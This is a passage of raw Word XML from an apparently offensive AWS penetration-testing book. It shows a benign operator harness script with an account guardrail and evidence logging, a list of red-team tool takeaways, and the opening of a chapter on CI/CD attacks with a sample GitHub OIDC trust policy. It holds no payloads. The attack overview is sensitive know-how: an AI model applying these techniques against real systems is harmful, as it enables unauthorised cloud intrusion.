          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A0565C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CloudGoat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C1EEF1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 Vulnerable, AWSGoat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A9989BA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>18.5  Building an operator's harness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F45A7FE"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Beyond the off-the-shelf tools, a practicing operator usually ends up with a personal harness: a small set of bash functions, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~/.aws/config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with named profiles for each engagement, an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>evidence.jsonl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> logger, and a set of cached snippets for common operations. The harness should at minimum include (a) a function that wraps every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> call and appends the CloudTrail-relevant parameters to the evidence file, (b) a per-engagement S3 bucket for operator-side artifacts (not the target's S3), (c) a credential-scoping wrapper that refuses to run against the wrong account id to prevent embarrassing cross-engagement mistakes, and (d) a set of aliases for the operator's ten most common commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4AAC30" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/.operator/guardrails.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BCA372" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># refuse to run if current account does not match engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD74FD6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>require_account() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1EB5A9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  expected=$1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042BE40C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  actual=$(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> sts get-caller-identity --query Account --output text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D8570F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"$expected"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"$actual"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> ]; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6090A4DA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"ACCOUNT MISMATCH expected=$expected got=$actual"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp;2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28112733" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="r"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35198780" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F700747" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D3F718" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># wrap aws with evidence capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BB5ECA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>awslog() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443023A7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  ts=$(date -u +%Y-%m-%dT%H:%M:%SZ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D4A752" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"{\"ts\":\"$ts\",\"cmd\":\"aws $*\"}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&gt; ~/.operator/evidence.jsonl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A23AC9C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"$@"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1C2E0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="534344495"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BDDBEC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AAD0B0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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focused toolset — CloudFox, Pacu, PMapper, TruffleHog, Stratus Red Team — covers 80% of AWS engagement needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B14D59E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ScoutSuite and Prowler are best used as misconfiguration backlog generators that prime exploitation hypotheses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3953D488" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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PMapper's graph reasoning is indispensable for non-trivial IAM environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D3FD8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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CloudGoat and its siblings are the practice ranges for every technique in this book.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77572485" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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Build a personal harness with account guardrails and evidence logging; the harness pays for itself on every engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65210776" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter 19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>CI/CD and Supply-Chain Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F28318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In the 2020-2022 wave of cloud breaches, the dominant entry vector was leaked static credentials. In the 2023-2026 wave, the dominant entry vector shifted to CI/CD federation: OIDC-based short-lived credentials issued from a trusted external identity provider to AWS roles. This shift was a security win — static credentials are worse — but it introduced a new attack surface that many organizations have not yet internalized. This chapter covers the four families of CI/CD attacks that red teams should expect t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>o see as the dominant entry class on contemporary engagements: OIDC trust over-broadening, Terraform state manipulation, dependency-confusion against build roles, and GitHub Actions workflow injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0400E4F5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>19.1  The GitHub Actions OIDC trust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315C4779"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typical GitHub Actions deploy role has a trust policy of the form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2EB6D6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67290D53" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Version"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"2012-10-17"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF12456" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Statement"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: [{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0BC265" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Effect"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Allow"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702D7DA5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Principal"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Federated"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"arn:aws:iam::111122223333:oidc-provider/token.actions.githubusercontent.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3A24CB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Action"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"sts:AssumeRoleWithWebIdentity"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA25157" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Condition"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57176F64" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"StringEquals"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391921AD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"token.actions.githubusercontent.com:aud"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"sts.amazonaws.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142DB53B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">      },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388E4192" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"StringLike"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44764D2A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"token.actions.githubusercontent.com:sub"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"repo:MyOrg/MyRepo:ref:refs/heads/main"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097B16E8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1197691261"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
